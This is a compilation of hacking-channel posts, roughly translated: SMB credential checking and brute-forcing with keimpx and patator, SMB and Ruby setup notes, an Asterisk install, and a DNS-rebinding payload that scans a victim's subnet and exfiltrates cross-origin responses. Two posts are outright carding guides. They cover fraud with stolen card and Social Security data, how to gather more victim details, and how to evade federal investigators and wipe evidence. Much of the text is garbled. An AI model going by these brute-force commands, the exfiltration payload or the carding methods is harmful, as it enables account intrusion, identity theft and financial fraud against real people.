▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑keimpx 2020 tool :
keimpx is an open source tool for quickly checking credentials over the network via SMB. Credentials can be:
t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) The combination of user / password in clear text.

> User / NTLM hash combination.

> NTLM login / user session token combination.

🦑 If after this phase of the attack any valid credentials were found on the network, the program will ask the user to select a host to connect to and which valid credentials to use. They will be used to open the SMB interactive shell where the user can:

1) Launch an interactive command line.

2) Perform actions in remote SMB network folders: display a list of files and folders, upload, download files, create, delete files, etc.
Deploy and collapse your own services, for example, a backdoor listening on a TCP port for incoming connections.

3) Show details about users, domains, and password policies.
Scan the subnet (-t 192.168.0.0/24) by checking the validity of the username (-U Alexey) and password (-P qweqwe123) for all hosts with network folders :

> git clone https://github.com/nccgroup/keimpx

> cd keimpx

> python3 ./keimpx.py -t 192.168.0.0/24 -U Alexey -P qweqwe123
Connect to the remote host (-t 192.168.0.101) using the username (-U U ndercOde) and password (-P qweqwe123) :

> python3 ./keimpx.py -t 192.168.0.101 -U Undercode -P qweqwe123
As a result, the specified credentials will be checked for correctness. If they are correct, you will be prompted to connect and open an interactive shell to interact with the remote system

🦑TESTED

E N J O Y
WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Brute-force SMB public folder user credentials
patator
T.me/iOsDeveloppers

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) The patator program is designed for brute-force credentials and is one of the most flexible to configure.

2) For brute-force online login and user password for accessing the shared folder (and therefore Windows user credentials), run a command of the form:

>clone https://github.com/lanjelot/patator
./patator.py smb_login host = 192.168.0.101 user = FILE0 password = FILE1 0 = / root / logins.txt 1 = / root / passwords.txt -x ignore: fgrep = 'STATUS_LOGON_FAILURE'

🦑In this command:

./patator.py - the name of the executable file, depending on the installation method it may be patator
smb_login - SMB brute force module
host = 192.168.0.101 - IP address of the computer on which the password is selected. You can specify a file with hosts (more precisely, the file placeholder number)
user = FILE0 - username for brute force. Instead of a name, a placeholder with a pointer to file number 0
password = FILE1 - password for brute force. Instead of a single password, a placeholder is written with a pointer to the file number 1
0 = / root / logins.txt - path to file number 0
1 = / root / passwords.txt - path to file number 1
-x ignore: fgrep = 'STATUS_LOGON_FAILURE' - do not display attempts, in response to which the line STATUS_LOGON_FAILURE was received


🦑That is, two pairs of credentials were found as example:

undercodeOverlord: 1234
undercode2: qweqwe123
Obtained computer name and version of Windows:

\ UndercOdeTesting (Windows 10.0 Build 18362)
Another account was found for which the message STATUS_ACCOUNT_RESTRICTION was received:

mial:
The message said that there are account restrictions for the mial user. The reason is that the username and password are correct (empty password), but users without a password are not allowed on this computer.

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What is Smb Protocol windows :
Twitter.com/UndercOdeTC

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Server Message Block (SMB) is a networking file share protocol included in Windows 10 that provides the ability to read and write files and perform other service requests to network devices.

2) Usually, you'll be using SMB to connect to devices that don't run Windows, such as a router with file sharing capabilities, Network-Attached Storage (NAS), or other computers running Linux.

3) Although there have been three major releases of the protocol, there is a chance that you may still have devices running the original version, such as SMB version 1 (v1) which is old and insecure, and Windows 10 no longer installs it by default starting with the Fall Creators Update and April 2018 Update. As a result, you'll get error messages like "You can't connect to the file share because it's not secure;" "The specified network name is no longer available;" and "Unspecified error 0x80004005" when trying to access your files.

Thats all!
@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SMB protocol recommended settings by UndercOde:

> Optional: there are several versions of the SMB protocol and by default the first version is disabled on modern Windows systems.
t.me/UndercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Samba uses the first version for some functions, so if you have a mixed Linux network or if you have outdated equipment that only supports SMB 1, then you can enable support for this version of the protocol. To do this, run cmd with administrator privileges. Check:

> dism /online /get-features /format:table | find "SMB1"

2) To enable SMB 1, do:

> dism /online /enable-feature /all /featurename:SMB1Protocol-Server

3) If you want to disable them, then do:

> dism /online /disable-feature /featurename:SMB1Protocol-Server

4) If you prefer a graphical interface, then in the search, type “ Turn Windows features on or off

search ,switych to on then apply

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to set up a network share on Windows (SMB) without a password
T.me/UndercOdeTesting


1) Computers must be on the same LAN


2) if your devices are connected to the same router, then they all will have access to the shared folder.

3) If you do the configuration in virtual machines , then in the " Network " tab , select " Network Bridge " as the " Connection Type ":

4) Static IP
To configure the SMB shared folder, the static IP address of the computer where the folder will be located is optional. The shared network folder (ball) can be accessed by computer name. Nevertheless, if you are more used to using IP, then you need to configure a static IP address for the computer, which will act as a file server.

5) Computers must have the same workgroup
A computer with a shared folder, as well as all other computers that will have access to the shared folder via SMB, must be in the same workgroup.

6) By default, in the Windows operating system, all computers have the same workgroup with the name WORKGROUP .

7) To check the current group on your computer, open the explorer, find the “ This computer ” tab in it , click the “ Computer ” button at the top and click the “ Properties ” button in the menu that opens

8) In the new window that opens, you will see " Computer Name " and " Workgroup ":

9) If you want to change these values, then click " Change Settings ."

Click the “Change” button to assign a new name to the computer

10) Network Folder Settings in Windows
Windows SMB provides not only network folders, but also the sharing of printers and other resources. Therefore, the settings of shared folders (network ball) are called “ shared ”.

On Windows, when connected to a new network, you may receive the request click at yes and done @UnderCodeTesting

11) A universal option, suitable for those with a wired connection or Wi-Fi: right-click on the network connection icon and click " Open network and Internet settings

12) In the window that opens, click on " Sharing Options ":

>If you want to go to these settings through the “ Control Panel ”, the way is: Control Panel \ Network and Internet \ Network and Sharing Center \ Additional sharing options

In the new window, the settings are divided into three sections:

Private
Guest or public
All networks

13) Shared with password protection
The description says: If password protection is enabled for shared access, only users with an account and password on this computer can access shared files, printers connected to this computer, and shared folders. To open access to other users, you need to disable password protection for shared access.
> switch to off


WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to install and use Ruby on Windows
twitter.com/UNDERCODETC

🦑 Why install Ruby :

> Ruby is a scripting language, that is, pre-compilation is not required to run programs. In this sense, Ruby is an analogue of PHP , Python , PERL and others.

> Ruby is a fairly popular language and many interesting programs are written on it; in terms of InfoSec, the well-known WPScan , WhatWeb , Wayback Machine Downloader and others can be cited as examples .

> By installing Ruby on Windows, you can run programs written in this language, as well as learn this programming language and write your own scripts.

> By the way, Ruby, like PHP, Python and PERL, can be a web server module, and scripts written in this language can be used as the programmatic basis of a website or service.

🦑 How to install Ruby on Windows :

1) To install, go to https://rubyinstaller.org/downloads/

2) There you will see many installer options that differ not only in versions, but also in the composition of the downloaded files.

3) Executables are self-contained installers for Windows that include the Ruby language, runtime, important documentation, and more.

4) If you do not know which version to install in order to get started with Ruby, the Ruby + Devkit 2.6.X installer (x64) is recommended .

5) It provides the largest number of compatible gem (Ruby packages) and installs MSYS2-Devkit along with Ruby, so that gem with C-extensions can be compiled immediately after installation.

6) Run the downloaded file. In this window we can select the settings

7) Add Ruby executables to your PATH - means adding a directory with Ruby executables to the system variable. This is recommended to avoid specifying the full path to the script interpreter each time the Ruby script is run.

8) Associate .rb and .rbw files with Ruby installation - means associate files with the extensions .rb and .rbw with the installed Ruby. Thanks to this, Ruby files can be launched by double-clicking or by typing the name of the script on the command line.

9) Use UTF-8 as default external encoding - means to use UTF-8 encoding as the default external encoding .

🦑Further we are invited to:

1) MSYS2 base installation<font></font>

2 ) MSYS2 system update (optional)<font></font>

3 ) MSYS2 and MINGW development toolchain<font></font>
<font></font>
Which components shall be installed? If unsure press ENTER [1,2,3]

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to update Ruby on Windows:
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) To upgrade to the latest patch (that is, the minor version, for example from 2.5.1 to 2.5.4), it is enough to launch a new version of the installer.

2) Installed gem (packages from the Ruby repository) are not overwritten and will work with the new version without reinstalling. To upgrade the installation, just use RubyInstaller without Devkit.

3) You can update Devkit separately by running the following command at the Windows command prompt:

> ridk install

4 )When a new major version is released, it cannot be updated by installing it in the same directory as the previous one. For example, if the previous version of the installation is RubyInstaller-2.5.x, and the new version is RubyInstaller-2.6.x, then you need to install it either in a new directory or delete the old version and install a new one instead, since gem (programs) with C extensions are not compatible between ruby-2.5 and 2.6.

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to install and use gem on Windows :
fb.com/UndercOdeTestingCompany

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) RubyGems is a package manager for Ruby. Using it, you can install various programs and their dependencies, installation can be done both from the source code on the local system, and from remote application sources.

2) The Ruby installation shown above also installs gem , so make sure to run the command:

> gem --help
You should see help on using gem.

3) To display all available gem commands, run:

> gem help commands

4) To install the package, run a command of the form:

> gem install

5) To show help about the installation command:

> gem help install

6) For example, to install the 'rake' program from a local directory or a remote server:

> gem install rake

7) Installing the 'rake' package only from a remote server:

> gem install rake --remote

8) Installing 'rake', but only version 0.3.1, even if there are unsatisfied dependencies, install in the user directory:

> gem install rake --version 0.3.1 --force --user-install

> gem list D

9) List local and remote gem whose name contains 'log':

> gem search log --both

10) The previous command is used to search for packages by name.
List only remote (non-local) gem whose name contains 'log':

> gem search log --remote

11) Delete 'rake':
> gem uninstall rake

12) View information about RubyGems:
> gem environment

13) Update all gem programs in the system:
> gem update

14) Update local version of RubyGems:

> gem update --system

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to install bundler :
fb.com/UndercOdeTestingCompany

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) bundler is a Ruby dependency manager. This manager is useful when installing other programs written in Ruby.

2) To install bundler on Windows, run:

> gem install bundler

3) To upgrade bundle, run the command:

> gem update bundle

4) If you install the program from the source code and there is a Gemfile file , then go to the folder with this program and run the command in it:

> bundle install

> This command will install all the dependencies listed in the Gemfile

5) To see where the gem packages installed with bundle are used, use the command:

> bundle info (name)_gem

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Recovering sites from the Internet Archive in Windows :
Let's start with the Wayback Machine Downloader program , which completely restores sites from the web archive.
T.me/undercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) To install Wayback Machine Downloader, just do:

on CmD

> gem install wayback_machine_downloader

> wayback_machine_downloader --help

2) To check the operability of the program, we’ll start site restoration from the Internet Archive:

> wayback_machine_downloader
(https://github.com/hartator/wayback-machine-downloader)

3) Basic Usage
> wayback_machine_downloader http://example.com

4) It will download the last version of every file present on Wayback Machine to ./websites/example.com/. It will also re-create a directory structure and auto-create index.html pages to work seamlessly with Apache and Nginx. All files downloaded are the original ones and not Wayback Machine rewritten versions. This way, URLs and links structure are the same as before

🦑TESTED by UndercOde:

> Windows 10 pro x-64

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Python and Outlook: delete letters and send messages:
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

# - * - coding: utf-8 - * -
# Two examples: deleting messages older than n days and sending an email

# Libraries
#Python for Windows Extensions - http://sourceforge.net/projects/pywin32/files/pywin32/Build%20219/
# .NET (I used 4.5) - http://www.microsoft.com/en-us /download/details.aspx?id=30653
import os, sys, pywintypes
import win32com.client
from datetime import datetime, timedelta

# Delete messages older than n days
stamp = datetime (1899, 12, 30, 0, 0, 0)

def dtime (s):
return stamp + timedelta (days = float (s))

# Create a COM object
app = win32com.client.Dispatch ("Outlook.Application")
ns = app.GetNamespace ("MAPI")

# 3 - Deleted
# 4 - Outbox
# 5 - Sent
# 6 - Inbox
folder = ns.GetDefaultFolder (3)

print (u "Delete letters older than 14 days from% s"% folder.Name)

# 14
daystamp past14days = datetime.now () - timedelta (days = 14)
mess_for_delete = []

# We sort the letters in the folder
for item in folder.Items:
if dtime (item.LastModificationTime) <past14days:
mess_for_delete.append (item)

# If you were older than 14 days, delete
info_all = u ""
if len (mess_for_delete)> 0:
for item in mess_for_delete:
info_all + = u "Deleted:% s \ n"% item.Subject
item.Delete ()
else:
info_all = u "No matching"


#
Create a message mess = app.CreateItem (0)
mess.To = "recipient@domen.com"

# To copy
mess.CC = "recipient@domain.com"

# Topic
mess.Subject = u "Messages older than 14 days have been deleted!"
# Body
mess.Body = info_all
# Attachment
mess.Attachments.Add ("C: \\ python \\ test.txt")

# Sending
mess.Send ()

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Asterisk on Debian
Procedure for installing Asterisk on Debian Squeeze.
twitter.com/undercodeTc

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) Installing the system, Debian Squeeze (x86). Next, we perform all actions from under root.

2) After installation, configure the network by configuring the / etc / network / interfaces file.

3) Install mc: aptitude install –y mc

4) We install the packages necessary for the normal functioning of asterisk: aptitude install –y flex, bison, g ++, libncurses5-dev, doxogen, unixodbc, build-essential, libxml2-dev, libsqlite3-dev, kernel-package, linux-headers-2.6.32- 5-686

4) Download raw pwlib-1.10.0.tar.gz and openh323-1.18.0.tar.gz from sourceforge, from asterisk.org - asterisk-1.8.5.0.tar.gz, from asterisk.ru - libpri-1.4.12. tar.gz, dahdi-linux-complete-2.5.0 + 2.5.0.tar.gz and codecs g723 / g729 - codec_g723-ast18-gcc4-glibc-core2.so and codec_g729-ast18-gcc4-glibc-core2.so and drop it all into the / usr / src / folder (codecs can be downloaded here: http://asterisk.lv/codecs )

5) Create a link: ln –s /usr/src/linux-headers-2.6.32-5-common/include/linux/compiler.h /usr/include/linux/compiler.h
Build pwlib:

6) Unpack pwlib-1.10.0.tar.gz: tar –zxvf pwlib-1.10.0.tar.gz
We go to the resulting folder: cd / usr / src / pwlib_v1_10_0
Run ./configure, then make clean opt and finally make install
Build openh323:

7) Unpack openh323-1.18.0.tar.gz: tar –zxvf openh323-1.18.0.tar.gz

8) We go to the resulting folder: cd / usr / src / openh323_v1_18_0

9) pWe write: export PWLIBDIR = / usr / src / pwlib_v1_10_0

10) Run ./configure, then make clean opt and finally make install
Build and install libpri:

11) Unpack libpri-1.4.12.tar.gz: tar –zxvf libpri-1.4.12.tar.gz
Go to the resulting folder: cd /usr/src/libpri-1.4.12

12) Perform make and make install

13) Build and install dahdi-linux:

14) Unpack dahdi-linux-complete-2.6.0.tar.gz: tar –zxvf dahdi-linux-complete-2.6.0

15) Go to the resulting folder: cd / usr / src / dahdi-linux-complete-2.6.0
Successively execute: make all, make install, make config

16) We put asterisk. Unpack asterisk-1.8.5.0.tar.gz: tar –zxvf asterisk-1.8.5.0.tar.gz, then go to /usr/src/asterisk-1.8.5.0/main

17) To prevent DTMF distortion during a callback from asterisk, open the dsp.c file for editing, find the line “static const float dtmf_row” and “static const float dtmf_col” there and bring them to the following form:


static const float dtmf_row [] =


732.0, 809.0, 894.0, 988.0

/ * 697.0, 770.0, 852.0, 941.0 * /


static const float dtmf_col [] =

{

1270.0, 1404.0, 1551.0, 1715.0

/ * 1209.0, 1336.0, 1477.0, 1633.0 * /

🦑 Go back to /usr/src/asterisk-1.8.5.0 and start building asterisk. We write:
export PWLIBDIR = / usr / src / pwlib_v1_10_0

and

export OPENH323DIR = / usr / src / openh323_v1_18_0

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Now Configure Asterisk on Debian
t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) do ./configure, make menuselect (if necessary, you can also select the ooh323 protocol there), make and make install

2) At the end of the compiler, run make samples and make config. You can optionally run make progdocs.

3) We go into / usr / lib / asterisk / modules and copy the codec_g723-ast18-gcc4-glibc-core2.so and codec_g729-ast18-gcc4-glibc-core2.so files there with renaming them to codec_g723.so and codec_g729.so respectively.

4) It all depends on the version of the C compiler (gcc or something else) and the processor model. In this example, the C compiler version is gcc4, and the processor model is Intel Core 2 Duo.

5) Next, go to / etc / asterisk, open the codecs.conf file for editing, disable vbr (vbr => false) and vad (vad => false), add a section at the end of the file to enable support for 723 codecs:

; 6.3 Kbps stream default


; 5.3 Kbps stream default

; sendrate = 53

6) Our asterisk is ready, you can run it with the asterisk command, you can connect to the asterisk console with the command asterisk

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Carding 2020
FRAUD WITH SS. KEY INFORMATION
Instagram.com/UndercOdeTestingCompany

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) I want to clarify right now. The secret in carding is not the number of cards that you own, but what you can do with these cards. What I mean? Everything is very simple.

2) Hypothetical situation: My name is Johnny and I have 3 SSs with SSN, DOB, CVV NUMBER, MMN, NAME, STREET ADDRESS, CITY, ZIP, AND BILLING TELEPHONE NUMBER. And also

3) I have a friend whose name is Billy with 300mi SS with CVV, MMN, NAME, STREET ADDRESS, CITY, ZIP, AND BILLING TEL. NUMBER Who is more likely to get something?


4) Simply put, I (Johnny). Why? Because I have more information that can prove that I am the person who owns these SSs than the one that three hundred Billy cards have.


5) Does this mean that Billy will not get a damn thing from his cards? No, it just means that Billy will have a hard time carding with checks.


6) Thus, to summarize this example, you should have as much information as possible on the card holder. The first rule of carding: the more information you have on the victim, the more


you have a chance of success. Here is the information you need to know (note: "card level" is not a technical term in carding, you just use L1, L2, L3 to



NAME:

ADDRESS:

CITY:

STATE:

ZIP CODE:

Tel. BILLING NUMBER:

CARD NUMBER:

CARD EXP DATE:

CVV CODE:


🦑 Ordinary CVV. If you have this information, then you are the owner of an ordinary SS. Currently, it is worth noting that this is a necessary minimum of information to work in


Social Security Number (SSN):

Date Of Birth (DOB):

Mothers Maide Name (MMN):

🦑 Partial Fulka. If you have this information, then you have a higher-level SS. With this information you should be able to card PayPal, c2it and some

BANK ACCOUNT NUMBER:

ROUTING NUMBER:

BANK NAME:

BANK NUMBER:

DRIVERS LICENSE NUMBER:

PIN NUMBER (For CC or ATM card)

🦑 next . If you have all this information, then with your SS you can junk everything your heart desires)

> Now, if all you have is ordinary SS, don't be upset. Just do some work (search) to increase the level of your map:

1) First of all, go to whitepages.com and try to find out the address and phone number of the cardholder. Make sure that all this really belongs to the cardholder.

2) Further. There is an excellent service called "Phantominfo" ( http://www.phantominfo.com, its owner lives on the SC forum), which will help you find information for your SSs such as SSN and

3) DOB for only $ 29 / month. Of course, many carders have PI accounts, so you can always ask for help.

4) And last but not least, a quick look at ancestry.com. Ancestry.com, this is a piece of whore, but you can find DOB and MMN (i.e. if your cardholder is called xy)

5) his father David x and his mother's name is Bella y, and Donna is MMN)

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑IMPROVEMENT OF ANONYMITy For Carding
instagram.com/UndercodeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Security is a key factor. Nobody needs the federals to rediscover all of us here, therefore we should be as anonymous as possible.

2) First of all, I must say that there is no 100% anonymity in carding. Do not let people fool you with promises of complete anonymity. You can use everything: proxy,

3) Wingates, Sox and hell knows what else, but you will always set aside “digital fingerprints” wherever you are. For my personal purposes, I use a bore ISP in combination with

4) an anonymizer account ( http://anonymizer.com ) and a first level proxy. But I do not recommend repeating this to everyone.

> http://anonymizer.com offers excellent services for those who want to remain anonymous. The trouble is that this is a service, and like in another service you will have to pay for it, plus in case

5) what they can hand you over. If you plan to use anonymizer, you just need to focus on keeping your IP secret from the anonymizer, and not from the site on which you

cardite.

6) Proxies and stuff: I use private hidden proxies, and I really don’t fuck with the rest of the proxies, so I can say not so much on this topic (maybe someone can

7) get free proxies at http://anonymitycheker.com/page1.htm, they also test proxies and other crap in real time there.

8) Stealther: These programs will help connect your proxies for maximum anonymity. Stealthers are registered using the key (so you will need to go to "UndercodeTesting

9) EvidenceEliminator: If you really seriously decided to do carding, then this program MUST be on your hard drive ANYWHERE! The feds have some

10) programs that help them extract interesting information for them, for example, the pages you visited, the files you deleted, and the emails you wrote. Each time when your computer restarts, E.E. It works by providing you security by erasing all logs and file history. You have to prepare for the best.

11) JAVA: Enemy Carder. It should always be disabled in your browser.

12) CARDED ISP: Honestly, I'm not sure if carding in ISP is safe. I have heard many different reviews about this idea. However, I can testify that I had experience

13) there was still no problem working with this case. Some popular ISPs are charged with Earthlink Pre-paid (you can pay for this service for a year, see the link on their websites) and America Online.

14) These are not the only options to ensure anonymity, only the most popular. If it seems to you that you have come across a working way to secure anonymity for yourself -

> use it anyway. You will never know what works and what doesn't until you try.

15) If you want to find out how well you have protected yourself, take the following tests:

> http://www.whatismyip.com: this is the first and main test. whatismyip.com is an easy way to find out which IP you are currently online on. JAVA doesn’t work here, so you can’t after

16) Successful passage consider yourself safe.

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

T.me/UndercOdeTesting
# SUPPORT & SHARE

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑DNS Rebinding Exploitation Framework 2019 updated :
t.me/UndercOdeTesting

dref does the heavy-lifting for DNS rebinding. The following snippet from one of its built-in payloads shows the framework being used to scan a local subnet from a hooked browser; after identifying live web services it proceeds to exfiltrate GET responses, breezing through the Same-Origin policy:

// mainFrame() runs first
async function mainFrame () {
// We use some tricks to derive the browser's local /24 subnet
const localSubnet = await network.getLocalSubnet(24)

// We use some more tricks to scan a couple of ports across the subnet
netmap.tcpScan(localSubnet, [80, 8080]).then(results => {
// We launch the rebind attack on live targets
for (let h of results.hosts) {
for (let p of h.ports) {
if (p.open) session.createRebindFrame(h.host, p.port)
}
}
})
}

// rebindFrame() will have target ip:port as origin
function rebindFrame () {
// After this we'll have bypassed the Same-Origin policy
session.triggerRebind().then(() => {
// We can now read the response across origin...
network.get(session.baseURL, {
successCb: (code, headers, body) => {
// ... and exfiltrate it
session.log({code: code, headers: headers, body: body})
}
})
})
}

@UNDERCODEOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁